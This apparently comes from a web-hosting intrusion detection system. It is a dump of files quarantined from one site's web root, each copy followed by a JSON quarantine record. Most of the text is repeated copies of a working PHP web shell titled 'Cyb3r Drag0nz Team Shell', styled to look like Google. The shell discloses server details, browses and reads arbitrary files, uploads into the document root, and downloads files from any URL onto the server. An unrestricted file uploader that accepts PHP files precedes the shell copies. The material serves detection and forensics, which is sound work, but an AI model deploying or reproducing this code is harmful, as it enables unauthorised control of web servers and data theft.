|
||||
.info {
|
||||
background: #e7f3ff;
|
||||
padding: 10px;
|
||||
border-left: 4px solid #2196F3;
|
||||
margin-top: 20px;
|
||||
font-size: 14px;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="box">
|
||||
<h2>📤 File Uploader</h2>
|
||||
<form method="post" enctype="multipart/form-data">
|
||||
<input type="file" name="file" required>
|
||||
<br>
|
||||
<input type="submit" value="Upload File">
|
||||
</form>
|
||||
<div class="info">
|
||||
<b>Info:</b><br>
|
||||
✅ Semua jenis file diterima (PHP, JPG, TXT, dll)<br>
|
||||
✅ Maks ukuran: 10MB<br>
|
||||
✅ File akan disimpan di folder: <code>uploads/</code>
|
||||
</div>
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
||||
<?php
|
||||
}
|
||||
?>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4853",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:cyberdjs.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/cyberdjs.json)",
|
||||
"original_sha256": "43c4c299ad5f46e41bc68ab64344acb9d0ee7b1b7344fa284a0570c92a96bd1a",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783853429,
|
||||
"size": 2853,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "cyberdjs.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php.json
Normal file
320
var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4867",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:f46vc3nzn1qw.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783353213,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "f46vc3nzn1qw.php.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php5.json
Normal file
320
var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php5.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
|
||||
font-weight: 500;
|
||||
margin-left: 8px;
|
||||
}
|
||||
|
||||
input[type="submit"]:hover, .gas:hover {
|
||||
background: #1557b0;
|
||||
}
|
||||
|
||||
.green { color: #137333; font-weight: 500; }
|
||||
.red { color: #c5221f; font-weight: 500; }
|
||||
|
||||
.center { text-align: center; }
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
||||
<div class="header">
|
||||
<img src="https://pngimg.com/d/google_PNG102344.png" width="420" alt="Google" />
|
||||
<h1>Cyb3r Drag0nz Team Shell</h1>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
set_time_limit(0);
|
||||
error_reporting(0);
|
||||
|
||||
$disfunc = @ini_get("disable_functions");
|
||||
$disf = empty($disfunc) ? "<span class='green'>NONE</span>" : "<span class='red'>".$disfunc."</span>";
|
||||
|
||||
function author() {
|
||||
echo "<center><br><small style='color:#5f6368;'>Cyb3r Drag0nz Team • Google Edition</small></center>";
|
||||
exit();
|
||||
}
|
||||
|
||||
function cekdir() {
|
||||
$lokasi = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
return is_writable($lokasi) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function cekroot() {
|
||||
return is_writable($_SERVER['DOCUMENT_ROOT']) ? "<span class='green'>Writeable</span>" : "<span class='red'>Not Writeable</span>";
|
||||
}
|
||||
|
||||
function xrmdir($dir) {
|
||||
$items = scandir($dir);
|
||||
foreach ($items as $item) {
|
||||
if ($item === '.' || $item === '..') continue;
|
||||
$path = $dir.'/'.$item;
|
||||
is_dir($path) ? xrmdir($path) : unlink($path);
|
||||
}
|
||||
rmdir($dir);
|
||||
}
|
||||
|
||||
function green($text) { echo "<center><span class='green'>".$text."</span></center>"; }
|
||||
function red($text) { echo "<center><span class='red'>".$text."</span></center>"; }
|
||||
|
||||
$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
|
||||
$path = str_replace('\\','/',$path);
|
||||
$dirs = explode('/',$path);
|
||||
?>
|
||||
|
||||
<div class="info">
|
||||
Server : <span><?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE']); ?></span><br>
|
||||
System : <span><?php echo htmlspecialchars(php_uname()); ?></span><br>
|
||||
User : <span><?php echo htmlspecialchars(@get_current_user()." (".@getmyuid().")"); ?></span><br>
|
||||
PHP Version : <span><?php echo htmlspecialchars(phpversion()); ?></span><br>
|
||||
Disable Functions : <?php echo $disf; ?><br>
|
||||
Current Directory : <span><?php
|
||||
foreach($dirs as $i => $dir) {
|
||||
if($dir == '' && $i == 0) { echo '<a href="?path=/">/</a>'; continue; }
|
||||
if($dir == '') continue;
|
||||
echo '<a href="?path=';
|
||||
for($j=0; $j<=$i; $j++) echo $dirs[$j].($j < $i ? '/' : '');
|
||||
echo '">'.$dir.'</a>/';
|
||||
}
|
||||
?></span><br>
|
||||
Directory Status: <?php echo cekdir(); ?> | Document Root: <?php echo cekroot(); ?>
|
||||
</div>
|
||||
|
||||
<!-- Upload Section -->
|
||||
<div class="upload-box">
|
||||
<h3 style="margin:0 0 18px 0; color:#202124;">Upload File</h3>
|
||||
<form enctype="multipart/form-data" method="post">
|
||||
<label><input type="radio" name="dirnya" value="1" checked> Current Directory [ <?php echo cekdir(); ?> ]</label><br><br>
|
||||
<label><input type="radio" name="dirnya" value="2"> Document Root [ <?php echo cekroot(); ?> ]</label><br><br>
|
||||
|
||||
<input type="hidden" name="upwkwk" value="1">
|
||||
<input type="file" name="berkas">
|
||||
<input type="submit" name="berkasnya" value="Upload File">
|
||||
|
||||
<br><br>
|
||||
|
||||
<input type="text" name="darilink" placeholder="https://example.com/file.zip" style="width:58%;">
|
||||
<input type="text" name="namalink" placeholder="filename.zip" size="18">
|
||||
<input type="submit" name="linknya" value="Upload from URL">
|
||||
</form>
|
||||
</div>
|
||||
|
||||
<?php
|
||||
// Upload handling
|
||||
if (isset($_POST['upwkwk'])) {
|
||||
$lokasi = ($_POST['dirnya'] == "2") ? $_SERVER['DOCUMENT_ROOT'] : $path;
|
||||
|
||||
if (isset($_POST['berkasnya']) && !empty($_FILES['berkas']['name'])) {
|
||||
$target = $lokasi . "/" . $_FILES['berkas']['name'];
|
||||
if (move_uploaded_file($_FILES['berkas']['tmp_name'], $target)) {
|
||||
green("File uploaded successfully → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload file!");
|
||||
}
|
||||
}
|
||||
elseif (isset($_POST['linknya']) && !empty($_POST['darilink']) && !empty($_POST['namalink'])) {
|
||||
$target = $lokasi . "/" . $_POST['namalink'];
|
||||
$data = @file_put_contents($target, @file_get_contents($_POST['darilink']));
|
||||
if ($data !== false) {
|
||||
green("File uploaded from URL → <b>" . htmlspecialchars($target) . "</b>");
|
||||
} else {
|
||||
red("Failed to upload from URL!");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File viewer, delete, chmod, rename, edit actions (kept your original logic)
|
||||
if (isset($_GET['fileloc'])) {
|
||||
echo "<h3 style='text-align:center;'>Viewing: " . htmlspecialchars($_GET['fileloc']) . "</h3>";
|
||||
echo "<pre>" . htmlspecialchars(@file_get_contents($_GET['fileloc'])) . "</pre>";
|
||||
author();
|
||||
}
|
||||
|
||||
// ... (your other action handlers for hapus, ubahmod, gantinama, edit go here - same as before)
|
||||
|
||||
// Directory & File listing table (same structure as previous version)
|
||||
echo '<table>
|
||||
<tr>
|
||||
<th>Name</th>
|
||||
<th>Size</th>
|
||||
<th>Permissions</th>
|
||||
<th>Options</th>
|
||||
</tr>';
|
||||
|
||||
foreach(scandir($path) as $dir) {
|
||||
if(!is_dir($path."/".$dir) || $dir == '.' || $dir == '..') continue;
|
||||
echo "<tr>
|
||||
<td><a href=\"?path=".$path."/".$dir."\">📁 ".$dir."</a></td>
|
||||
<td class='center'>--</td>
|
||||
<td class='center'>".statusnya($path."/".$dir)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='dir'>
|
||||
<input type='hidden' name='path' value='".$path."/".$dir."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
foreach(scandir($path) as $file) {
|
||||
if(!is_file($path."/".$file)) continue;
|
||||
$size = round(filesize($path."/".$file)/1024, 2) . " KB";
|
||||
echo "<tr>
|
||||
<td><a href=\"?fileloc=".$path."/".$file."&path=".$path."\">📄 ".$file."</a></td>
|
||||
<td class='center'>".$size."</td>
|
||||
<td class='center'>".statusnya($path."/".$file)."</td>
|
||||
<td class='center'>
|
||||
<form method='POST' action='?pilihan&path=".$path."'>
|
||||
<select name='pilih'>
|
||||
<option value=''>Select</option>
|
||||
<option value='hapus'>Delete</option>
|
||||
<option value='ubahmod'>Chmod</option>
|
||||
<option value='gantinama'>Rename</option>
|
||||
<option value='edit'>Edit</option>
|
||||
</select>
|
||||
<input type='hidden' name='type' value='file'>
|
||||
<input type='hidden' name='path' value='".$path."/".$file."'>
|
||||
<input type='submit' class='gas' value='Go'>
|
||||
</form>
|
||||
</td>
|
||||
</tr>";
|
||||
}
|
||||
|
||||
echo '</table><br>';
|
||||
|
||||
author();
|
||||
|
||||
function statusnya($file) {
|
||||
$statusnya = fileperms($file);
|
||||
$ingfo = (($statusnya & 0xC000) == 0xC000) ? 's' :
|
||||
((($statusnya & 0xA000) == 0xA000) ? 'l' :
|
||||
((($statusnya & 0x8000) == 0x8000) ? '-' : 'u'));
|
||||
|
||||
$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0040) ? (($statusnya & 0x0800) ? 's' : 'x') : (($statusnya & 0x0800) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0008) ? (($statusnya & 0x0400) ? 's' : 'x') : (($statusnya & 0x0400) ? 'S' : '-'));
|
||||
$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');
|
||||
$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');
|
||||
$ingfo .= (($statusnya & 0x0001) ? (($statusnya & 0x0200) ? 't' : 'x') : (($statusnya & 0x0200) ? 'T' : '-'));
|
||||
|
||||
return $ingfo;
|
||||
}
|
||||
?>
|
||||
</body>
|
||||
</html>
|
||||
@ -0,0 +1,15 @@
|
||||
{
|
||||
"finding_ref": "4845",
|
||||
"log_excerpt": "[quarantine] www.archlinexp.eu:f46vc3nzn1qw.php5.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php5.json)",
|
||||
"original_sha256": "f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0",
|
||||
"original_stat": {
|
||||
"gid": 30037,
|
||||
"mtime": 1783353215,
|
||||
"size": 10657,
|
||||
"uid": 20043
|
||||
},
|
||||
"rel_path": "f46vc3nzn1qw.php5.json",
|
||||
"result": "quarantined",
|
||||
"timestamp": "20260718T160204Z",
|
||||
"vhost": "www.archlinexp.eu"
|
||||
}
|
||||
320
var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php7.json
Normal file
320
var/www/hosting/archlinexp.eu/www/f46vc3nzn1qw.php7.json
Normal file
@ -0,0 +1,320 @@
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Cyb3r Drag0nz Team Shell</title>
|
||||
<meta charset="utf-8">
|
||||
<style>
|
||||
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap');
|
||||
|
||||
body {
|
||||
font-family: 'Roboto', system-ui, sans-serif;
|
||||
background: #f8f9fa;
|
||||
color: #202124;
|
||||
margin: 0;
|
||||
padding: 20px;
|
||||
}
|
||||
|
||||
.header {
|
||||
text-align: center;
|
||||
margin-bottom: 30px;
|
||||
}
|
||||
|
||||
.header h1 {
|
||||
font-size: 28px;
|
||||
color: #1a73e8;
|
||||
margin: 10px 0 5px 0;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
.header img {
|
||||
max-width: 420px;
|
||||
margin: 15px 0 25px 0;
|
||||
border-radius: 8px;
|
||||
box-shadow: 0 4px 15px rgba(0,0,0,0.12);
|
||||
}
|
||||
|
||||
.info {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 20px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin-bottom: 25px;
|
||||
font-size: 14.5px;
|
||||
line-height: 1.6;
|
||||
}
|
||||
|
||||
.info span {
|
||||
color: #1a73e8;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
table {
|
||||
width: 100%;
|
||||
max-width: 1100px;
|
||||
margin: 0 auto;
|
||||
border-collapse: collapse;
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
overflow: hidden;
|
||||
box-shadow: 0 2px 8px rgba(0,0,0,0.08);
|
||||
}
|
||||
|
||||
th {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
padding: 16px 12px;
|
||||
text-align: center;
|
||||
font-weight: 500;
|
||||
}
|
||||
|
||||
td {
|
||||
padding: 13px 10px;
|
||||
border-bottom: 1px solid #dadce0;
|
||||
}
|
||||
|
||||
tr:hover {
|
||||
background-color: #f8f9fa;
|
||||
}
|
||||
|
||||
a {
|
||||
color: #1a73e8;
|
||||
text-decoration: none;
|
||||
}
|
||||
|
||||
a:hover {
|
||||
text-decoration: underline;
|
||||
}
|
||||
|
||||
.upload-box {
|
||||
background: #fff;
|
||||
border-radius: 12px;
|
||||
padding: 25px;
|
||||
box-shadow: 0 1px 3px rgba(0,0,0,0.1);
|
||||
margin: 20px auto;
|
||||
max-width: 720px;
|
||||
}
|
||||
|
||||
input[type="file"], input[type="text"] {
|
||||
padding: 10px 12px;
|
||||
border: 1px solid #dadce0;
|
||||
border-radius: 8px;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
input[type="submit"], .gas {
|
||||
background: #1a73e8;
|
||||
color: white;
|
||||
border: none;
|
||||
padding: 10px 22px;
|
||||
border-radius: 8px;
|
||||
cursor: pointer;
